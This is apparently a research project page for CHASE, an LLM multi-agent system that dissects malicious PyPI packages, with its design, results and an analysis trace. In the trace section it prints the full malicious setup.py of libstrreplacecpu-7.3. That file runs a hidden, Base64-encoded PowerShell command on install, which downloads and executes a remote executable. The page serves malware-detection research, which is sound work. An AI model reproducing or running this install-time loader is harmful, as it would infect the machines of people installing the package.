AIware 2025

CHASE: LLM Agents for Dissecting Malicious PyPI Packages

¹Waseda University, ²RIKEN AIP, ³NICT
CHASE System Overview

Abstract

Modern software package registries like PyPI have become critical infrastructure for software development, but are increasingly exploited by threat actors distributing malicious packages with sophisticated multi-stage attack chains. While Large Language Models (LLMs) offer promising capabilities for automated code analysis, their application to security-critical malware detection faces fundamental challenges, including hallucination and context confusion, which can lead to missed detections or false alarms.

We present CHASE (Collaborative Hierarchical Agents for Security Exploration), a high-reliability multi-agent architecture that addresses these limitations through:

  • A Plan-and-Execute workflow for analysis stability
  • Specialized Worker Agents focused on specific analysis aspects
  • Integration with deterministic security tools for critical operations

Our key insight is that reliability in LLM-based security analysis emerges not from improving individual model capabilities but from architecting systems that compensate for LLM weaknesses while leveraging their semantic understanding strengths.

Why CHASE?

Existing detection methods face a fundamental limitation: they can identify where suspicious code exists, but struggle to accurately explain what it actually does.

Capability                MalGuard       GuardDog       CHASE
Detection performance     Strong         Limited        Strong
Where is it suspicious?   Yes            Yes            Yes
What does it do?          Conditional*   Conditional*   Yes

* MalGuard and GuardDog generate explanations by mapping detected function names to pre-written descriptions. While useful, this yields only a post-hoc summary of known suspicious patterns. In contrast, CHASE works on the code itself, deobfuscating layered payloads and reasoning over analysis traces to reveal its true intent.

CHASE actively deobfuscates layered payloads and retrieves remote content to reveal the attacker's true intent, producing high-fidelity, actionable reports that include:

  • Attack chain reconstruction
  • Attacker's ultimate goal
  • Indicators of Compromise (IoCs)
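As an illustration of how these three report elements could be carried in a machine-readable form, the following is a minimal sketch. The class name `AnalysisReport` and its field names are hypothetical and are not CHASE's actual output schema; the example values are taken from the libstrreplacecpu-7.3 example later on this page, and the listed indicators are candidate IoCs only.

```python
import json
from dataclasses import asdict, dataclass, field
from typing import List


@dataclass
class AnalysisReport:
    """Hypothetical report container; field names are assumptions."""
    package: str
    attack_chain: List[str]          # ordered steps of the reconstructed attack
    attacker_goal: str               # the attacker's ultimate goal
    iocs: List[str] = field(default_factory=list)  # indicators of compromise


report = AnalysisReport(
    package="libstrreplacecpu-7.3",
    attack_chain=[
        "setup.py launches a hidden PowerShell process with an encoded command",
        "the decoded command downloads an executable from Dropbox",
        "the downloaded executable is run",
    ],
    attacker_goal="download and execute a malicious executable",
    iocs=["www.esquelesquad.rip", "tahgoficial@proton.me"],
)

# Serialize to JSON so the report can be consumed by other tools.
report_json = json.dumps(asdict(report), indent=2)
print(report_json)
```

Keeping the attack chain as an ordered list preserves the sequence of events, which a flat set of matched patterns would lose.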

Quantitative Results

Evaluated on a dataset of 3,000 real-world packages (500 malicious, 2,500 benign):

Method          Precision   Recall   F1
MalGuard (RF)   0.972       0.922    0.946
GuardDog        0.675       0.854    0.754
CHASE (Ours)    0.996       0.984    0.990
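As a quick consistency check, F1 is the harmonic mean of precision and recall, so each F1 value in the table can be recomputed from the other two columns. The sketch below does this with the numbers copied from the table; the function name `f1_score` is just a local helper.

```python
# (precision, recall, reported F1) copied from the results table.
reported = {
    "MalGuard (RF)": (0.972, 0.922, 0.946),
    "GuardDog": (0.675, 0.854, 0.754),
    "CHASE": (0.996, 0.984, 0.990),
}


def f1_score(precision: float, recall: float) -> float:
    """Harmonic mean of precision and recall."""
    if precision + recall == 0:
        return 0.0
    return 2 * precision * recall / (precision + recall)


for method, (p, r, f1) in reported.items():
    computed = f1_score(p, r)
    print(f"{method}: computed F1 = {computed:.3f}, reported F1 = {f1:.3f}")
```

All three recomputed values agree with the reported F1 scores to three decimal places.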

Architecture

CHASE's design is inspired by how human security experts analyze malicious code. Professional analysts dynamically switch between exploratory activities (surveying code to form hypotheses) and exploitative activities (focusing on specific tasks such as deobfuscation). CHASE assigns the exploratory role to the Supervisor and the exploitative role to the Workers.

The multi-agent architecture of CHASE, using a Plan-and-Execute workflow and a Supervisor-Worker model.

Design Principles

1. Supervisor-Worker Multi-Agent Architecture

A single Supervisor agent maintains the global analysis perspective, while specialized Worker agents execute domain-specific tasks:

  • Deobfuscator: Handles code deobfuscation, decryption, and safe execution
  • Web Researcher: Investigates external resources and queries threat intelligence

2. Plan-and-Execute Workflow

Unlike simple reactive approaches that get trapped in repetitive failures, CHASE's Supervisor dynamically adjusts its analysis plan based on Worker results. This is crucial for malware analysis, where outcomes are unpredictable.

3. Reliability-Oriented Coordination

  • State-Based Communication: Avoids context poisoning by maintaining all information in a central state variable
  • Minimal Toolsets: Each Worker has only the tools it needs, preventing cognitive overload
  • Budget-Aware Planning: Prevents potential infinite loops in multi-agent systems
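The three design principles above can be sketched together in a few lines. This is a toy illustration under stated assumptions, not CHASE's implementation: the Workers are stubs that return fixed strings instead of calling an LLM or tools, and the names `AnalysisState`, `replan`, and `run` are hypothetical.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, List


@dataclass
class AnalysisState:
    """Central state: the only channel through which agents share information."""
    plan: List[str] = field(default_factory=list)      # pending Worker tasks
    findings: List[str] = field(default_factory=list)  # accumulated results
    budget: int = 5                                     # max Worker calls allowed


def deobfuscator(state: AnalysisState) -> str:
    return "decoded payload reveals a download URL"     # stub result


def web_researcher(state: AnalysisState) -> str:
    return "reputation of the remote resource checked"  # stub result


WORKERS: Dict[str, Callable[[AnalysisState], str]] = {
    "deobfuscator": deobfuscator,
    "web_researcher": web_researcher,
}


def replan(state: AnalysisState, finding: str) -> None:
    """Stub for the Supervisor's re-planning step after each Worker result."""
    if "download URL" in finding:
        state.plan.append("web_researcher")


def run(state: AnalysisState) -> AnalysisState:
    # The budget check bounds the loop even if re-planning keeps adding tasks.
    while state.plan and state.budget > 0:
        task = state.plan.pop(0)
        state.budget -= 1
        finding = WORKERS[task](state)
        state.findings.append(f"{task}: {finding}")
        replan(state, finding)
    return state


final = run(AnalysisState(plan=["deobfuscator"]))
print(final.findings)
```

Because every Worker reads from and writes to the same state object, no Worker depends on another Worker's conversation history, and the budget counter guarantees termination.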

Analysis Example

The following trace shows CHASE analyzing libstrreplacecpu-7.3, a malicious package that downloads and executes a malicious executable via an obfuscated PowerShell command.

The analysis trace for libstrreplacecpu-7.3 as generated by CHASE.

Step-by-Step Analysis

Step 1: Supervisor creates an initial plan after observing the raw source code.

Step 2: Supervisor delegates the obfuscated PowerShell command to Deobfuscator.

Step 3: Deobfuscator decodes the Base64 payload, revealing a Dropbox download URL.

Step 4: Supervisor updates the plan based on the new finding.

Step 5: Web Researcher investigates the URL via VirusTotal, where it is flagged by 7 of 63 vendors.

Step 6: Web Researcher investigates the author's email and the suspicious domain.

Step 7: Supervisor compiles the final analysis report.
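The decoding in Step 3 can be reproduced with a deterministic tool. PowerShell's -EncodedCommand argument is a Base64 string over UTF-16LE text, so the sketch below decodes in that order. The helper names are illustrative and this is not necessarily how CHASE's Deobfuscator is implemented; for brevity only the first 32 characters of the string from setup.py are decoded here.

```python
import base64


def decode_encoded_command(token: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (Base64 over UTF-16LE)."""
    raw = base64.b64decode(token, validate=True)
    return raw.decode("utf-16-le")


def encode_command(command: str) -> str:
    """Inverse operation, used here only to build a harmless test input."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# First 32 characters of the -EncodedCommand string in setup.py.
prefix = "cABvAHcAZQByAHMAaABlAGwAbAAgAEkA"
print(decode_encoded_command(prefix))  # prints: powershell I

# Round trip on a benign command.
benign = 'Write-Output "hello"'
assert decode_encoded_command(encode_command(benign)) == benign
```

Decoding only transforms bytes into text and never executes the command, which makes it safe to run on untrusted input.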

Raw Source Code in libstrreplacecpu-7.3

Full code of setup.py:
from distutils.core import setup

try:
  import subprocess
  import os
  if not os.path.exists('tahg'):
    # www.esquelesquad.rip
    subprocess.Popen('powershell -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAiAGgAdAB0AHAAcwA6AC8ALwBkAGwALgBkAHIAbwBwAGIAbwB4AC4AYwBvAG0ALwBzAC8AcwB6AGcAbgB5AHQAOQB6AGIAdQBiADAAcQBtAHYALwBFAHMAcQB1AGUAbABlAC4AZQB4AGUAPwBkAGwAPQAwACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiAH4ALwBXAGkAbgBkAG8AdwBzAEMAYQBjAGgAZQAuAGUAeABlACIAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACIAfgAvAFcAaQBuAGQAbwB3AHMAQwBhAGMAaABlAC4AZQB4AGUAIgA=', shell=False, creationflags=subprocess.CREATE_NO_WINDOW)
except: pass
try:
  setup(
    name = 'libstrreplacecpu',
    packages = ['modlib'],
    version = '3.42',
    # license='MIT',
    description = 'A library for creating a terminal user interface',
    author = 'EsqueleSquad',
    author_email = 'tahgoficial@proton.me',
    classifiers=[
      'Development Status :: 3 - Alpha',
      'Intended Audience :: Developers',
      'Topic :: Software Development :: Build Tools',
      'License :: OSI Approved :: MIT License',
      'Programming Language :: Python :: 3',
      'Programming Language :: Python :: 3.4',
      'Programming Language :: Python :: 3.5',
      'Programming Language :: Python :: 3.6',
      'Programming Language :: Python :: 3.7',
      'Programming Language :: Python :: 3.8',
      'Programming Language :: Python :: 3.9',
      'Programming Language :: Python :: 3.10',
      'Programming Language :: Python :: 3.11',
    ],
  )
except: pass
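The "where is it suspicious?" question can be answered for a file like this without running it. The following minimal sketch parses Python source with the standard `ast` module and reports string literals that carry an -EncodedCommand argument. It is an illustration only, not the detection logic of CHASE, MalGuard, or GuardDog. Only the full flag name is matched, and the sample input is a harmless stand-in whose token encodes `whoami`.

```python
import ast
import re
from typing import List, Tuple

# Matches the flag followed by a Base64 token (abbreviated flags not handled).
ENCODED_FLAG = re.compile(r"-EncodedCommand\s+([A-Za-z0-9+/]+={0,2})", re.IGNORECASE)


def find_encoded_commands(source: str) -> List[Tuple[int, str]]:
    """Return (line number, Base64 token) for each matching string literal."""
    hits = []
    # ast.parse only builds a syntax tree; the analyzed code is never executed.
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for match in ENCODED_FLAG.finditer(node.value):
                hits.append((node.lineno, match.group(1)))
    return hits


sample = '''
import subprocess
subprocess.Popen("powershell -WindowStyle Hidden -EncodedCommand dwBoAG8AYQBtAGkA", shell=False)
'''
print(find_encoded_commands(sample))  # prints: [(3, 'dwBoAG8AYQBtAGkA')]
```

A scan like this locates the suspicious string but says nothing about what the command does. Closing that gap is what the deobfuscation and research steps are for.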
                

Model Configuration

CHASE employs a tiered hierarchy of local LLMs, served via SGLang, to balance capability with cost:

Role         Model                  Purpose
Supervisor   Qwen/Qwen3-32B         Multi-step reasoning, plan orchestration
Workers      Qwen/Qwen3-8B          Focused, domain-specific tasks
Formatter    google/gemma-3-4b-it   JSON output conversion

This configuration runs on a single NVIDIA H100 NVL, making it economically feasible for continuous monitoring.
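One way to express this tiering in code is a small role-to-model mapping, sketched below. The model identifiers come from the table above; the `RoleConfig` class, the `MODEL_TIERS` dictionary, and the `model_for` helper are hypothetical names, and the sketch does not start or contact any SGLang server.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class RoleConfig:
    """Hypothetical per-role configuration entry."""
    model: str    # model identifier from the table above
    purpose: str  # what the role is used for


MODEL_TIERS = {
    "supervisor": RoleConfig("Qwen/Qwen3-32B", "multi-step reasoning, plan orchestration"),
    "worker": RoleConfig("Qwen/Qwen3-8B", "focused, domain-specific tasks"),
    "formatter": RoleConfig("google/gemma-3-4b-it", "JSON output conversion"),
}


def model_for(role: str) -> str:
    """Look up the model assigned to a role; raises KeyError for unknown roles."""
    return MODEL_TIERS[role].model


print(model_for("supervisor"))  # prints: Qwen/Qwen3-32B
```

Routing the largest model only to the Supervisor keeps the more frequent Worker and formatting calls on smaller models.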

Expert Evaluation

We conducted a user study with three cybersecurity professionals (security strategist, red team engineer, threat intelligence analyst) to evaluate the quality of CHASE-generated reports for three packages (one benign, two malicious) across five dimensions:

Dimension       Benign   Malicious 1   Malicious 2
Accuracy        3.6      3.8           3.7
Completeness    2.9      4.0           4.2
Clarity         4.1      3.9           4.3
Actionability   3.1      4.0           3.8
Reliability     3.0      4.0           4.0

(5-point Likert scale: 1 = Strongly Disagree, 5 = Strongly Agree)
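To compare the three reports at a glance, the scores can be averaged per package, as in the sketch below. The unweighted mean across dimensions is a simplification introduced here (it treats Likert scores as interval data and weights all dimensions equally) and is not a statistic reported by the authors.

```python
# Scores copied from the table: (Benign, Malicious 1, Malicious 2).
scores = {
    "Accuracy": (3.6, 3.8, 3.7),
    "Completeness": (2.9, 4.0, 4.2),
    "Clarity": (4.1, 3.9, 4.3),
    "Actionability": (3.1, 4.0, 3.8),
    "Reliability": (3.0, 4.0, 4.0),
}
packages = ("Benign", "Malicious 1", "Malicious 2")


def column_means() -> dict:
    """Unweighted mean over the five dimensions for each package."""
    return {
        name: sum(row[i] for row in scores.values()) / len(scores)
        for i, name in enumerate(packages)
    }


for name, mean in column_means().items():
    print(f"{name}: {mean:.2f}")
```

The means come out at 3.34, 3.94, and 4.00 respectively, so the benign report scores lowest overall, driven mainly by Completeness, Actionability, and Reliability.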

Key Findings

  • Strong ratings for Completeness of threat overview and Clarity of terminology
  • Tendency to over-assess risks in benign code (generating overly cautious warnings)
  • Evaluations varied by professional role: threat analysts rated highest, while red team engineers requested more technical precision

BibTeX

@inproceedings{toda2025CHASE,
author       = {Toda, Takaaki and Mori, Tatsuya},
title        = {{CHASE: LLM Agents for Dissecting Malicious PyPI Packages}},
booktitle    = {2025 2nd IEEE/ACM International Conference on AI-powered Software (AIware)},
pages        = {1--10},
publisher    = {IEEE},
year         = {2025},
doi          = {10.1109/AIware69974.2025.00008},
url          = {https://doi.ieeecomputersociety.org/10.1109/AIware69974.2025.00008},
}

Acknowledgments

Part of this work is based on results obtained from project JPNP24003, commissioned by the New Energy and Industrial Technology Development Organization (NEDO).